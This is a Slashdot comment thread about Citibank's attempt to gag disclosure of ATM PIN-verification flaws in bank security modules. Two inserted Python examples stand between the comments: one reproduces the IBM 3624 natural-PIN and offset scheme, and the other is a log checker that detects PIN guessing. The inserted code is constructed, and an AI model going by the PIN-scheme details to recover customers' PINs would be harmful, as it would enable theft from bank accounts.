    Save the World! Use a Quote!
    1. Re:Tell 'em to prove it. by Beryllium+Sphere(tm) · · Score: 1

      That's actually not far from the winning strategy in a court case described in Ross Anderson's wonderful book, "Security Engineering".

      A bank customer tried to get an unauthorized withdrawal reversed, and the bank responded by hauling him into court on fraud charges.

      The bank argued that their systems were infallible. The defense said the legal equivalent of "prove it", demanding to run an independent review of the bank's security practices.

      The bank suddenly lost interest in trying to imprison their customer.

  12. dmca problems, again? by micq · · Score: 3, Insightful

    This is the kind of shit that scares me about the DMCA...

  13. So easy to read! by Anonymous Coward · · Score: 2, Funny

    Thanks for making sure it looked okay!

  14. New System by alaric187 · · Score: 5, Funny

    Oh you guys, that's just Citibank's patented Security Through Litigation (tm) method. I hear it works wonders on keeping financial info secure.

  15. This was covered at k5 also by Anonymous Coward · · Score: 5, Interesting

    Mostly it affects where banks choose your PIN for you (which happens in the UK among other places) based upon a hash of your account number. Not that a 4-digit PIN was a particularly strong encryption method, but this paper merely says it's even weaker when based off the user's account number. However, it seems this crack is most easily achieved by an insider, not your local script kiddie with Aunt Edna's ATM card.

    Read more here:
    http://www.kuro5hin.org/story/2003/2/20/61350/0548

    1. Re:This was covered at k5 also by Dudio · · Score: 5, Informative

      Mostly it affects where banks choose your pin for you (which happens in the UK among other places) based upon a hash of your account number.

      While technically true, the catch is that this applies to a lot of PINs, even those chosen by the cardholder. When you set your own PIN, the bank just stores an offset that is used in conjunction with the autogenerated PIN. The vulnerability paper goes into this in section 3.

    2. Re:This was covered at k5 also by seaan · · Score: 1

      When you set your own PIN, the bank just stores an offset that is used in conjunction with the autogenerated PIN.

      This is true in one of the most common algorithms, commonly known within the industry as the "IBM 3624" (named after an older ATM model I believe). The algorithm takes an account number, a secret key, and some configuration information and produces something called a "natural PIN". As mentioned above, a customer selected PIN results in an offset that is applied to the natural PIN.

      There are however a variety of other PIN Verification Number (PVN) algorithms that don't produce a natural PIN. Instead the PIN is another input into the hash algorithm, and the resulting value cannot accurately be called an offset. A good example is another algorithm mentioned in the paper - the Visa PVV (this algorithm is also superior to the 3624 algorithm for a variety of reasons, including use of 3DES process instead of single-DES, and superior resistance to broken PINs).

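The natural-PIN-plus-offset arithmetic that Dudio and seaan describe, as an added example (not code from the paper, the thread, or any bank's HSM). It assumes the validation data is the rightmost 16 account digits, and it uses an HMAC-SHA256 keyed function in place of the single-DES encryption the real 3624 method performs, since DES is not in the Python standard library; the decimalization and offset steps are the ones described above.

```python
"""IBM 3624 'natural PIN' + offset scheme, as described in the two comments above.

Added example, not code from the paper, the thread, or any bank.  The genuine
3624 method encrypts the validation data with single DES under the PIN
verification key held inside the HSM; DES is not in the Python standard
library, so an HMAC-SHA256 keyed function stands in for it here (assumption).
The decimalization and offset arithmetic are the parts the thread describes.
"""
import hashlib
import hmac

# Conventional default decimalization table: hex digit 0-F -> decimal digit.
# Digits 0-9 map to themselves; A-F wrap around to 0-5.
DEFAULT_DECTAB = "0123456789012345"


def _keyed_block(key: bytes, validation_data: str) -> str:
    """Stand-in for DES-ECB(key, validation_data): returns 16 upper-case hex digits."""
    digest = hmac.new(key, validation_data.encode("ascii"), hashlib.sha256).hexdigest()
    return digest[:16].upper()


def validation_data(account_digits: str) -> str:
    """Assumed layout: the rightmost 16 account digits, left-padded with zeros."""
    digits = "".join(ch for ch in account_digits if ch.isdigit())
    return digits[-16:].rjust(16, "0")


def natural_pin(key: bytes, account_digits: str, pin_length: int = 4,
                dectab: str = DEFAULT_DECTAB) -> str:
    """Natural PIN: decimalize the encrypted validation data and keep the first digits."""
    hex_block = _keyed_block(key, validation_data(account_digits))
    decimalized = "".join(dectab[int(h, 16)] for h in hex_block)
    return decimalized[:pin_length]


def _check_digits(a: str, b: str) -> None:
    if len(a) != len(b) or not (a.isdigit() and b.isdigit()):
        raise ValueError("expected two decimal strings of equal length")


def pin_offset(natural: str, chosen: str) -> str:
    """Offset stored for a customer-selected PIN: chosen minus natural, digit-wise mod 10."""
    _check_digits(natural, chosen)
    return "".join(str((int(c) - int(n)) % 10) for n, c in zip(natural, chosen))


def apply_offset(natural: str, offset: str) -> str:
    """Reverse of pin_offset: natural plus offset, digit-wise mod 10, no carry."""
    _check_digits(natural, offset)
    return "".join(str((int(n) + int(o)) % 10) for n, o in zip(natural, offset))


def enrol_pin(key: bytes, account_digits: str, chosen: str,
              dectab: str = DEFAULT_DECTAB) -> str:
    """What the issuer stores with the account when the customer picks a PIN.

    Only the offset is stored.  It is not a secret on its own, but anyone who can
    obtain the natural PIN (that is, anyone with use of the verification key)
    gets the customer's chosen PIN by adding the offset, which is why
    customer-chosen PINs share the exposure of bank-assigned ones.
    """
    natural = natural_pin(key, account_digits, len(chosen), dectab)
    return pin_offset(natural, chosen)


def verify_pin(key: bytes, account_digits: str, offset: str, entered_pin: str,
               dectab: str = DEFAULT_DECTAB) -> bool:
    """Verification as the HSM performs it: recompute the natural PIN, add the offset, compare."""
    if len(entered_pin) != len(offset) or not entered_pin.isdigit():
        return False
    natural = natural_pin(key, account_digits, len(offset), dectab)
    expected = apply_offset(natural, offset)
    return hmac.compare_digest(expected.encode("ascii"), entered_pin.encode("ascii"))


if __name__ == "__main__":
    key = b"constructed-test-key"     # constructed; a real key never leaves the HSM
    account = "4111111111111111"      # constructed sample account number
    offset = enrol_pin(key, account, "7391")
    print("natural PIN:", natural_pin(key, account), "stored offset:", offset)
    print("verify 7391:", verify_pin(key, account, offset, "7391"))
    print("verify 1234:", verify_pin(key, account, offset, "1234"))
```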
  16. right to know by dougnaka · · Score: 5, Informative
    The statements made by Citibank regarding their security can only be trusted as far as they are independently evaluated. Consumers in general, and especially Americans, rely far too heavily on a company's claims. If a company makes false claims these days they often simply ignore the facts, and that enough is wrong. But when someone comes out with evidence that a company is making false claims, and the company tries to silence them? That is outright immoral, and should be illegal.

    Why is it they can even try things like this without massive public backlash? They would be far better off accepting the "new" information, and promising to work hard to always keep their systems secure.

    I'm sure certain companies would love to see legal actions like this get upheld by a court.... Oh well, I guess we can always move to Norway... I wonder if they'd let me live on Sealand once all my rights are gone here...

    --
    My Linux Command of the Day site : LCOD
    1. Re:right to know by Anonymous Coward · · Score: 0

      The Tobacco industry is far more professional in public deception and PR. In the end they coughed up. Radar speed detectors being infallible... the claims keep on coming, Asbestos, DVT on planes, and withdrawals are safe (as the Billings method).

      Cases still need to be decided on probabilities, not assurances.
      If assurances made were knowingly false, then outcomes are distorted. To use that information for personal or corporate gain, should be a crime.

    2. Re:right to know by dougnaka · · Score: 1

      Agreed, and I would say that their previous claims and assurances were made in "good faith" and Citibank could therefore not be held liable, but once they know about it any further claims or assurances are complete lies.

      --
      My Linux Command of the Day site : LCOD
    3. Re:right to know by KernelHappy · · Score: 3, Informative

      All processors in the debit card industry are required to have their security procedures audited. This includes extensive documentation of any change made to production code, handling of master encryption keys, database maintenance etc. It's not that the companies don't answer to someone, it's that the someone they answer to either doesn't see the weakness or realizes the huge cost involved in rectifying these problems and ignores it.

      --
      -- Button up, your ignorance is showing
    4. Re:right to know by gene_tailor · · Score: 1
      > Consumers in general, and especially Americans

      Why do you say especially Americans? Just curious...

      --
      It also occurs to me that if one was drowning, yelling "Help! I'm drowning and I lost my bikini top" would probably be m
    5. Re:right to know by dougnaka · · Score: 1

      because 1. I am one, and primarily know Americans. 2. Most people I've known while I've lived outside the US have been more skeptical of companies' claims. and 3. because poking Americans gets you points with moderators...

      --
      My Linux Command of the Day site : LCOD
    6. Re:right to know by SpaceLifeForm · · Score: 0, Troll

      Mods, save your points for me since I'm going to be poking my GF later.

      --
      You are being MICROattacked, from various angles, in a SOFT manner.
  17. This is SERIOUS by arvindn · · Score: 5, Insightful
    This isn't like one of the regular "a new vulnerability has been discovered. No exploitz are known yet. Patch can be found " kind of things we get on bugtraq all the time.

    From the article

    For the last couple of years or so there has been a rising tide of phantoms. I get emails with increasing frequency from people all over the world whose banks have debited them for ATM withdrawals that they deny making. Banks in many countries simply claim that their systems are secure and so the customers must be responsible. It now looks like some of these vulnerabilities have also been discovered by the bad guys.

    What the bank is doing is very irresponsible. I hope they get lots of bad publicity for this. Getting on /. is a good start.

    1. Re:This is SERIOUS by dachshund · · Score: 4, Informative
      It now looks like some of these vulnerabilities have also been discovered by the bad guys.

      Of course, this isn't necessarily the case. Note that this particular scheme would require an insider in the bank with access to the PIN-verification system. Until somebody verifies that, or at least combs through the logs to look for patterns of suspicious PIN guessing, any connection between the increase in phantom withdrawals and this vulnerability is pure speculation.

    2. Re:This is SERIOUS by mosch · · Score: 4, Insightful
      Yes, but the banks are claiming that the system contains no vulnerabilities at all. The presence of any vulnerability demonstrates that the banks are being less than honest with the courts.

      Last I checked, it's significantly illegal to be less than honest with the courts.

    3. Re:This is SERIOUS by Hammerikaner · · Score: 2, Insightful

      Everyone should just mirror the PDF file on your own web server. Would it matter then, if the court filed an injunction? Everyone already has it.

    4. Re:This is SERIOUS by gr0nd · · Score: 1

      The bugtraq post has lots of links:

      >To: ukcrypto@chiark.greenend.org.uk
      >Subject: Citibank tries to gag crypto bug disclosure
      >Date: Thu, 20 Feb 2003 09:57:34 +0000
      >From: Ross Anderson
      >
      >
      >Citibank is trying to get an order in the High Court today gagging
      >public disclosure of crypto vulnerabilities:
      >
      > http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_gag.pdf
      >
      >I have written to the judge opposing the order:
      >
      > http://www.cl.cam.ac.uk/ftp/users/rja14/citibank_response.pdf
      >
      >The background is that my student Mike Bond has discovered some really
      >horrendous vulnerabilities in the cryptographic equipment commonly
      >used to protect the PINs used to identify customers to cash machines:
      >
      > http://www.cl.cam.ac.uk/TechReports/UCAM-CL-TR-560.pdf
      >
      >These vulnerabilities mean that bank insiders can almost trivially
      >find out the PINs of any or all customers. The discoveries happened
      >while Mike and I were working as expert witnesses on a `phantom
      >withdrawal' case.
      >
      >The vulnerabilities are also scientifically interesting:
      >
      > http://cryptome.org/pacc.htm
      >
      >For the last couple of years or so there has been a rising tide of
      >phantoms. I get emails with increasing frequency from people all over
      >the world whose banks have debited them for ATM withdrawals that they
      >deny making. Banks in many countries simply claim that their systems
      >are secure and so the customers must be responsible. It now looks like
      >some of these vulnerabilities have also been discovered by the bad
      >guys. Our courts and regulators should make the banks fix their
      >systems, rather than just lying about security and dumping the costs
      >on the customers.
      >
      >Curiously enough, Citi was also the bank in the case that set US law
      >on phantom withdrawals from ATMs (Judd v Citibank). They lost. I hope
      >that's an omen, if not a precedent ...
      >
      >Ross Anderson

    5. Re:This is SERIOUS by kchayer · · Score: 1
      or at least combs through the logs to look for patterns of suspicious PIN guessing

      I don't know if all banks do this, but at one my wife used to work at, if you entered a PIN incorrectly 3 times in a row on one card, the ATM machine would eat the card and refuse to return it. The people emptying and refilling ATM canisters (one of the things my wife did) would find these cards and destroy them. The customer was forced to get a new one (which I think was free). That would at least limit PIN guessing, unless you really want to be diligent about visiting different ATMs...if you're looking to rip people off, there are probably easier ways.

      I imagine many banks would flag a bunch of invalid attempts at least. And the above mentioned method obviously doesn't work in ATMs where you swipe your card, as opposed to inserting it into a slot.

      --

      "I say consider this day seized!" -Hobbes
      "Tomorrow we'll seize the day and throttle it!" -Calvin
    6. Re:This is SERIOUS by poot_rootbeer · · Score: 1


      Why do you assume that the "bad guys" who are exploiting the vulnerability AREN'T employed by the bank itself? There's no proof that Citibank isn't to blame except Citibank's own word.

    7. Re:This is SERIOUS by dachshund · · Score: 2, Informative
      According to the researchers, the attack would really require direct access to the bank's pin-verification computer (Hardware Security Module) in order to be useful.

      They also note that you can avoid traps that rely on a series of bad PIN entries by mixing your "guesses" with valid requests from the card's owner.

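A log check of the kind dachshund suggests, written as an added example (not from the paper or any bank): it runs over constructed PIN-verification log lines and compares the three-strikes consecutive-failure lockout kchayer describes with a count of all failures per card in a time window, which still fires when failed guesses are interleaved with the cardholder's own successful transactions, plus a per-source fan-out check for one requester failing against many different cards. The log format, field names and thresholds are all constructed for the example.

```python
"""Spotting PIN guessing in verification logs, as an added example (not from the
paper or any bank).  Log line format is constructed for this example:
    '<epoch seconds> <card token> <requesting source> <OK|FAIL>'
Three checks are shown:
  1. consecutive_failure_lockout: the 3-strikes card retention described above,
     which a guesser defeats by interleaving guesses with the owner's real use;
  2. sliding_window_failures: total failures per card in a trailing window,
     which counts the interleaved guesses too;
  3. source_fanout: one requesting source failing against many distinct cards
     in a window, the shape an 'any or all customers' insider would leave.
"""
from collections import defaultdict, deque
from typing import Deque, Dict, List, Set, Tuple

Event = Tuple[int, str, str, bool]  # (timestamp, card, source, ok)

# Constructed sample: card-A is guessed at atm-17 with the owner's own OK
# transactions at atm-02 in between; card-C hits three straight failures;
# host-batch fails once each against four different cards within seconds.
SAMPLE_LOG = """\
1045700000 card-A atm-17 FAIL
1045700060 card-A atm-17 FAIL
1045700120 card-A atm-02 OK
1045700180 card-A atm-17 FAIL
1045700240 card-A atm-17 FAIL
1045700300 card-A atm-02 OK
1045700360 card-A atm-17 FAIL
1045700480 card-B atm-05 FAIL
1045700540 card-B atm-05 OK
1045700600 card-C atm-09 FAIL
1045700660 card-C atm-09 FAIL
1045700720 card-C atm-09 FAIL
1045700800 card-D host-batch FAIL
1045700801 card-E host-batch FAIL
1045700802 card-F host-batch FAIL
1045700803 card-G host-batch FAIL
"""


def parse_log(text: str) -> List[Event]:
    """Parse the constructed format above into time-ordered events."""
    events: List[Event] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, card, source, result = line.split()
        events.append((int(ts), card, source, result == "OK"))
    events.sort()
    return events


def consecutive_failure_lockout(events: List[Event], limit: int = 3) -> Set[str]:
    """Cards that would be retained by an ATM counting only consecutive failures."""
    streak: Dict[str, int] = defaultdict(int)
    locked: Set[str] = set()
    for _, card, _, ok in events:
        if ok:
            streak[card] = 0          # a successful entry resets the counter
        else:
            streak[card] += 1
            if streak[card] >= limit:
                locked.add(card)
    return locked


def sliding_window_failures(events: List[Event], limit: int = 3,
                            window: int = 3600) -> Dict[str, int]:
    """Card -> timestamp at which its failures within `window` seconds first reached `limit`.

    Successes do not reset anything, so guesses spread between the owner's
    genuine transactions are still counted.
    """
    recent: Dict[str, Deque[int]] = defaultdict(deque)
    flagged: Dict[str, int] = {}
    for ts, card, _, ok in events:
        if ok:
            continue
        q = recent[card]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= limit and card not in flagged:
            flagged[card] = ts
    return flagged


def source_fanout(events: List[Event], limit: int = 3,
                  window: int = 3600) -> Dict[str, List[str]]:
    """Source -> distinct cards it failed against when it first reached `limit` within `window`."""
    recent: Dict[str, Deque[Tuple[int, str]]] = defaultdict(deque)
    flagged: Dict[str, List[str]] = {}
    for ts, card, source, ok in events:
        if ok:
            continue
        q = recent[source]
        q.append((ts, card))
        while q and ts - q[0][0] > window:
            q.popleft()
        distinct = {c for _, c in q}
        if len(distinct) >= limit and source not in flagged:
            flagged[source] = sorted(distinct)
    return flagged


if __name__ == "__main__":
    evs = parse_log(SAMPLE_LOG)
    print("retained by 3-strikes lockout:", consecutive_failure_lockout(evs))
    print("flagged by sliding window:    ", sliding_window_failures(evs))
    print("sources fanning out:          ", source_fanout(evs))
```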
    8. Re:This is SERIOUS by Old+Wolf · · Score: 1

      When was the last time there was a court case where the defence didn't tell lies?

    9. Re:This is SERIOUS by Anonymous Coward · · Score: 0

      Where do i send those emails again?

      There are several large withdrawls on my account that I ... uh ... didn't make. Yeah, that's it. I never withdrew that money, so Citibank needs to give it back. To me. Now.

      Please?

    10. Re:This is SERIOUS by namespan · · Score: 1

      Last I checked, it's significantly illegal to be less than honest with the courts.

      A fact which has to be legally verified, unfortunately, a game which, if you've got the resources, you can play until people get sick of chasing you, or until you misdirect them sufficiently.

      Look at Clinton. Almost certainly committed perjury. Did he even get a wrist slap (other than losing a lot of respect)?

      --
      Libertarianism is rich wolves and poor sheep playing gambler's ruin for dinner.
    11. Re:This is SERIOUS by Anonymous Coward · · Score: 0

      "Until somebody verifies that, or at least combs through the logs to look for patterns of suspicious PIN guessing,"

      Assuming whoever is inside and can attempt the attack cannot clean up the logs.

    12. Re:This is SERIOUS by Beryllium+Sphere(tm) · · Score: 2, Insightful
      What logs?

      Notice that one of the proposed fixes was to create an audit trail.

    13. Re:This is SERIOUS by Anonymous Coward · · Score: 0

      and prosecutors are always honest, right?

    14. Re:This is SERIOUS by Anonymous Coward · · Score: 0

      the ATM machine would eat the card and refuse to return it.

      I've only seen ONE ATM that physically pulled in your card. All the rest I've ever seen are the 'swipe your card' or 'dip your card' types. Neither of these can "eat" your card.

      Where are you that you have ATMs that pull in your card?

    15. Re:This is SERIOUS by Anonymous Coward · · Score: 0

      Of course, this isn't necessarily the case. Note that this particular scheme would require a insider in the bank with access to the pin-verification system. Until somebody verifies that, or at least combs through the logs to look for patterns of suspicious PIN guessing, any connection between the increase in phantom withdrawals and this vulnerability is pure speculation.

      A slashdotter that doesn't jump to conclusions and just start over-reacting? It's a miracle. :)

      Yes, you're 100% correct.. there are more ways than one for a PIN to become public information. The general rise in card number trafficking I would think to be more to blame. Social engineering people out of their PINs is trivial compared to running this scheme with any long-term predictability.

    16. Re:This is SERIOUS by mosch · · Score: 1
      Yes, Clinton may have lied about a question which shouldn't have been asked. Good thing we've brought honor to the White House by selecting a president who'll kill for oil, who is starting a new mini-Vietnam in the Philippines, who is willing to put American lives in grave danger rather than allow the inspections to work, and who spent less investigating the whole of 9/11 than was spent investigating each individual inch of Clinton's penis.

      Yep... thank god we got rid of that perjurious Clinton, now life is wonderful, what with our roaring economy, our feelings of comfort and safety at home and our fantastic new international reputation.

    17. Re:This is SERIOUS by Rip!ey · · Score: 1

      Where are you that you have ATMs that pull in your card?

      Here in Australia it counts for almost all of them. The newer ones where you just swipe your card have only started to appear in the last 6 months or so.

    18. Re:This is SERIOUS by Anonymous Coward · · Score: 0

      Then look at Bush. Tells all kinds of stories about Iraq and Saddam Hussein that nobody is able to prove or even verify. Still threatens to throw bombs on him.

      At the same time, throws no bombs on other country (Israel) that provably commits the same mistakes. Considers them his friends.

      Strange guy, this Bush. Must be mentally insane.

    19. Re:This is SERIOUS by jedrek · · Score: 1

      Look at Clinton. Almost certainly committed perjury.

      It pretty much came to this:

      Prosecutor: did you fuck around?
      Clinton: (looks at wife) uhh... no.

      Like it's been said before, I don't want a president who's stupid enough to say 'yes' when someone asks him that.

    20. Re:This is SERIOUS by sean23007 · · Score: 1

      Last I checked, it's significantly illegal to be less than honest with the courts.

      Well, that depends on what your definition of the word "is" is. ;)

      --

      Lack of eloquence does not denote lack of intelligence, though they often coincide.
    21. Re:This is SERIOUS by Ambient+Sheep · · Score: 1
      Where are you that you have ATMs that pull in your card?

      In 18 years of using ATMs here in the U.K., I have ***never*** seen an ATM that *didn't* pull in your card. They all do here.

      Amazed to hear of ones that don't, as I believe they tend to write back to the card a lot of the time (as a method of enforcing your daily limit offline), which isn't possible on a simple swipe machine.

    22. Re:This is SERIOUS by namespan · · Score: 1

      I like Bush less than Clinton. Much less. I don't think that changes the fact that Clinton committed perjury when asked a question that, whether or not you believe SHOULD have been asked, legally could be and was asked. And should have been answered truthfully.

      Again, no claim on my part that Bush is a better president, or even that he's a better person, or hasn't broken 15 laws. None of that is excuse for perjury. Nothing is.

      --
      Libertarianism is rich wolves and poor sheep playing gambler's ruin for dinner.
    23. Re:This is SERIOUS by operagost · · Score: 1

      Hi Alec Baldwin. So, when are you planning on leaving the country again?

      --

      Gamingmuseum.com: Give your 3D accelerator a rest.
  18. atm pins by syle · · Score: 0, Offtopic

    I swear this is a duplicate from today but I can't find the original post. Am I going crazy?

    --

    /syle

    1. Re:atm pins by TheRaven64 · · Score: 1

      Am I going crazy?
      Yes.

      --
      I am TheRaven on Soylent News
    2. Re:atm pins by terraformer · · Score: 1

      Do you read bugtraq? It came out on there 2 days ago? Tom

      --
      Who are you? The new #2 Who is #1? You are #617565. I am not a number, I am a free man! Muhahaha.
    3. Re:atm pins by Anonymous Coward · · Score: 0

      You may have seen it on the Register. Most good stories appear there several hours before slashdot. I don't know if it's related to time zones or the fact that the register is run by real journalists...

    4. Re:atm pins by Hell+O'World · · Score: 1

      I bet you are getting your K5 mixed up with your /.
      Happens to me all the time. I almost submitted it here when I saw it there, but my last 4 submissions were rejected :( so I didn't bother.

    5. Re:atm pins by damiam · · Score: 1

      It was on k5, among other places.

      --
      It's hard to be religious when certain people are never incinerated by bolts of lightning.
  19. Discussion over a donut and a coke at Citibank by Anonymous Coward · · Score: 0

    Citibank CEO: "Guys, we need a new algorithm for our pin-codes. Our current 'pin-code-backwards'-encryption wasn't sufficient."

    Germany Tech-boy: "I know one very strong. It's called brot13 and it is supposed to be very strong."

    Another teccie: "Dude, it's ROT13 and I have heard it is the strongest encryption algorithm ever. Good choice!"

    1. Re:Discussion over a donut and a coke at Citibank by Anonymous Coward · · Score: 0

      Oh fsck...its German, not Germany :) Maybe I ate too many donuts myself hehe

    2. Re:Discussion over a donut and a coke at Citibank by Anonymous Coward · · Score: 0

      Hail Deutschland !!! What is there to drink here?

    3. Re:Discussion over a donut and a coke at Citibank by Anonymous Coward · · Score: 0

      "Hey fun boys, GET A ROOM!"

  20. Submission to /. by prgammans · · Score: 5, Funny

    So they submitted it to /. to gag it for them.
    Much quicker than a court order.

    1. Re:Submission to /. by wirelessbuzzers · · Score: 1

      Brilliant! Because if everyone is reading the article, nobody will be able to get through to... oh wait...

      --
      I hereby place the above post in the public domain.
  21. PINs can't work, only RSA will do. by Anonymous Coward · · Score: 1, Funny

    We should teach our kids at school how to raise a 200-digit challenge number to a secret 200-digit power, modulo a 200-digit composite public key, all in their head. Then ATM machines could use this math to achieve secure authentication.

  22. They Can't by neurostar · · Score: 2, Insightful

    Tell 'em to prove it.

    Well, as nice as it would be to have them prove the security, it is technically impossible to prove that a system is secure. It is only possible to prove that a system is not secure by exposing a flaw.

    neurostar
    1. Re:They Can't by SquadBoy · · Score: 2, Informative

      The parent poster of course knew this fact. :)

      Now think for a minute about what s/he was trying to say. :)

      --

      Cypherpunks: Civil Liberty Through Complex Mathematics. Those who live by the sword die by the arrow.
    2. Re:They Can't by neurostar · · Score: 1

      Ahhh ok. Hehe. Whoops!

      neurostar
    3. Re:They Can't by TClevenger · · Score: 1
      Well, as nice as it would be to have them prove the security, it is technically impossible to prove that a system is secure. It is only possible to prove that a system is not secure by exposing a flaw.

      You mean, kinda like making the leader of a country prove that he doesn't have weapons of mass destruction?

      (Yeah, kinda offtopic, but it proves the point.)

    4. Re:They Can't by Old+Wolf · · Score: 1

      Rubbish. For example, you can prove mathematically that RSA is secure. You can do the same for other systems.

    5. Re:They Can't by wirelessbuzzers · · Score: 2, Informative

      No. It hasn't even been proved that cracking RSA requires factoring, even with simplified assumptions about how you're going to be using it. And nobody knows whether tomorrow someone will solve factoring. You can't prove anything secure without P!=NP or some small-n approximation to that. A proof like that would be revolutionary.

      --
      I hereby place the above post in the public domain.
  23. More meat to the story by UberLord · · Score: 5, Informative

    http://www.theregister.co.uk/content/55/29425.html

    The Register is running a story with more content

    Which also explains in layman's terms how the two guys in the submitted link went about working out the vulnerability

    1. Re:More meat to the story by unicron · · Score: 0, Offtopic

      The hell with content I say! This is Slashdot, we're all about sensationalist editorializing!

      --
      Finally, math books without any of that base 6 crap in them.
    2. Re:More meat to the story by UberLord · · Score: 1

      Really? And there was I thinking it was all about whoring karma by providing better links ;)

  24. They should just give up... by Llywelyn · · Score: 3, Interesting

    "Citibank is trying to get a gag order for new vulnerabilities found in the cryptographic equipment commonly used to protect the PINs of ATM transactions..."

    Now that it has been posted on /. there are probably thousands of geeks downloading it as we speak. I think we can safely say that it is "in the wild"

    --
    Integrate Keynote and LaTeX
  25. ATM with an eye by doubtless · · Score: 4, Informative

    I believe that in some countries banks actually install a camera in every ATM they own. They simply take a video or a snapshot of the person making transaction with the machine.

    I think this is pretty good idea to record frauds, false claims, and extortions in front of the machine. Personally I don't have a privacy issue in this case.

    --
    geek page at KY speaks
    1. Re:ATM with an eye by DragonMagic · · Score: 1

      Except not every ATM is equipped with this, or, like those around here, when it gets really snowy, sometimes cars driving past the external ATMs can splash slush and salt onto the covering of the camera and block its view.

      Probably the best thing to do is a complete overhaul of the CC, ATM and Debit Card markets, over the course of the next ten years or so. Increase the numbers to 24 digits, secure a pin of no less than six digits, and have complete address verification based on the entire address, country and postal code, instead of the absurdly simple address/postal code there is now.

      It wouldn't be too difficult to supply most terminals with an update to software, and upgrade other pieces of software, to accept both types of cards until the old ones are phased out. And it wouldn't cost too much more money, since they're not replacing all the old cards, just phasing them out when new ones are released.

      So why don't they?

      --

      Human nature is the same everywhere; the modes only are different. -- Earl of Chesterfield
    2. Re:ATM with an eye by Skyshadow · · Score: 2, Insightful
      I believe that in some countries banks actually install a camera in every ATM they own. They simply take a video or a snapshot of the person making transaction with the machine.

      Most ATMs in the US are under video surveillance, too.

      Of course, this won't prevent me from using a technical exploit to rob them. All I need to do is find an ATM in a somewhat secluded place (not hard), put on a ski mask just before I go to work and not take it off while I'm robbing the thing blind.

      Cameras != protection from crime. They just assist in catching stupid criminals.

      --
      Every year during my review, I just pray the words "slashdot.org" aren't mentioned.
    3. Re:ATM with an eye by Anonymous Coward · · Score: 0
      Don't forget latex gloves and mirror shades. Cover up that license plate too, unless you're sure the second camera won't pick it up.


      The footage probably would help me argue in court that the guy in the camera footage doesn't have my build, I don't own a car like that and I live nowhere remotely near the target ATM. That should be enough to get me off the hook for my lost funds.


      Then when the bank is going over their employee records looking for the insider who compromised their security and happen to notice that your car looks a lot like the one in the video footage...

    4. Re:ATM with an eye by TBone · · Score: 1

      That may be, but then you end up with someone who isn't you, who has your pin code, and is getting money from your account... Why, you must have given it to them! Because the systems are secure, right? He said/she said blah blah.

      --

      This space for rent. Call 1-800-STEAK4U

    5. Re:ATM with an eye by Cruciform · · Score: 1

      But chances are they don't keep the video data long enough to protect the average customer until they see their bank statement.
      If you're robbed at the ATM, chances are you'll report the crime as soon as you can, or if you're found lying in front of the ATM they'll check the tape right away.
      But if the victim doesn't check their account balance regularly, they'll be waiting until statement time... and then it may be too late. The video will most likely be recorded over.

    6. Re:ATM with an eye by Old+Wolf · · Score: 1

      You underestimate the unwashed. There are still people around who find the current ATMs scary.

      How about a complete overhaul of IPv4 because we're running out of class B addresses? Answers:
      - Not everyone agrees on the new protocol
      - Can't co-ordinate mass switchover
      - Nobody wants to pay for its development
      - It's easier to introduce subnetting to avoid the problem

      and so on and so forth. BTW 16 digits is good enough. The current system can have longer PINs phased in over time. A lot of the software and HSMs support PINs of up to 12 digits. Perhaps if one bank takes the initiative and upgrades their equipment to 6-digit PINs, customers will join that bank because of security. But perhaps more likely, they will not join it because 6 digits is harder to remember.

      Changing software is not as easy in the banking world as it is in the PC world. Any code change has to be audited and approved by authorities, this can take months. Also, installing the new software has to be done in such a way that there is no downtime for the servers.

    7. Re:ATM with an eye by Anonymous Coward · · Score: 0

      Every Citibank branch I've been to in NYC does this.

    8. Re:ATM with an eye by (H)elix1 · · Score: 1

      Of course, this won't prevent me from using a technical exploit to rob them. All I need to do is find an ATM in a somewhat secluded place (not hard), put on a ski mask just before I go to work and not take it off while I'm robbing the thing blind.

      Or a well aimed laser-pointer while you rob a somewhat public ATM when it is blind....

    9. Re:ATM with an eye by rfmobile · · Score: 1

      The cameras are only useful for recording a violent crime in front of the ATM - like a forced withdrawal at gunpoint. The videotape is retained for 48 hours and then re-used. Even if your monthly bank statement arrived the next day, it likely would not show such a recent transaction.

    10. Re:ATM with an eye by Anonymous Coward · · Score: 0

      The issue isn't with money being taken from an ATM using a stolen or bogus card. The theft is made by those inside the banks, skimming a little from different accounts.

  26. Credit please by grub · · Score: 2, Funny


    involving 'phantom' ATM transactions that users deny making but that banks still charge to customers accounts because they claim their systems are secure

    "Honestly, Mr. Citibank Manager, why would I buy several cases of Fort Garry Ale or Guinness? I demand you credit my account."

    --
    Trolling is a art,
  27. Wrong hardware listed by chiph · · Score: 2, Informative

    These attacks defeat machines such as the Racal RG7000 and the IBM 4758/CCA which are commonly used to protect the PINs and keys used in automatic teller machines.

    While the IBM 4758 has been cracked before, it's not something that someone can do on their lunch break. What I suspect is being cracked is the little desktop unit that the customer service rep spins around for you to enter your PIN when you sign up for ATM service.

    Chip H.

    1. Re:Wrong hardware listed by Old+Wolf · · Score: 1

      Who modded this as informative? If the poster had read the article, he would have seen that it is the bank servers (HSMs) that are being exploited.

    2. Re:Wrong hardware listed by weblogger · · Score: 1

      There are cases, as described in another post, happening in Portugal, as our national news is reporting.

  28. Anyone have details on Judd vs. Citibank? by burgburgburg · · Score: 1

    Since this is the case listed as establishing US law on phantom withdrawals, and is listed as a Citibank loss, anyone have further details?

  29. Coincidence..., I think not. by revery · · Score: 2, Funny

    First there was the Phantom Menace, then there was the Phantom Edit, now we have "phantom" transactions... coincidence? I think not.

    George Lucas is involved here somewhere.

    --

    I sense a great disturbance in the fiber, as if a million ATM transactions were suddenly silenced...

    1. Re:Coincidence..., I think not. by Anonymous Coward · · Score: 0

      that was pathetic.

  30. Link to news story about this attack by skintigh2 · · Score: 2, Informative

    http://www.theregister.co.uk/content/55/29425.html

    Sorry, HTML formatting doesn't seem to be working...

  31. to answer your questions by Anonymous Coward · · Score: 0

    The ATM sends an encrypted request asking a CENTRAL server if it is OK to give you the amount of money you ask for. If yes, then it gives you the money. The central server requests the money from your bank when the batch is run.
    (By central server I don't mean there is only one, I mean that the ATM does not ask your bank directly, it asks a machine that is owned and operated by the organization that owns the ATM.)

    ATM lines are land lines.

